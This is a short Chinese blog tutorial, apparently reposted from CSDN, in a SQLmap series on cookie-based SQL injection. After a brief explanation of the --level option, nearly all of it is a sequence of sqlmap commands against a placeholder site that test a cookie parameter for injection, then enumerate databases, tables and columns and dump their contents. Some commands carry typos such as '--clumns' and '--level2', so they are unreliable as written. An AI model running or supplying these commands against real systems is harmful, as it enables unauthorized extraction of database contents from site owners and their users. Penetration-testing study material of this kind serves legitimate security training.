SQLmap系列—4、Cookie注入

文章来源：FLy_鹏程万里

版权声明：本文为CSDN博主「FLy_鹏程万里」的原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接及本声明。

https://blog.csdn.net/Fly_hps/java/article/details/80198522

说明：默认情况下SQLMAP只支持GET/POST参数的注入测试，但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数，当>=3的时候将检查User-agent和Referer，那么这就很简单了，我们直接在原有的基础上面加上 –level 2 即可！

1、判断是否可以注入

Sqlmap –u http://www.xxx.com/cookie/test.asp  --cookie  id=1 --level 2

2、猜解数据库

Sqlmap –u http://www.xxx.com/cookie/test.asp  --cookie  id=1  --dbs --level 2

3、猜解表

Sqlmap –u http://www.xxx.com/cookie/test.asp  --cookie  id=1  --tables  --level2

4、猜解字段

Sqlmap –u http://www.xxx.com/cookie/test.asp  --cookie id=1  –T  表名 --clumns  --level2

5、猜解内容

Sqlmap –u http://www.xxx.com/cookie/test.asp  --cookie id=1  –T  表名 -C  字段名  --dump  --level2

往期精选

*Kali linux渗透测试系列—3、 Kali Linux渗透测试环境搭建之Kali linux基本配置

*Kali linux渗透测试系列—2、 Kali Linux渗透测试环境搭建之Kali Linux中Vmtools的安装

*Kali linux渗透测试系列—1、Kali linux渗透测试环境搭建之Kali Linux环境搭建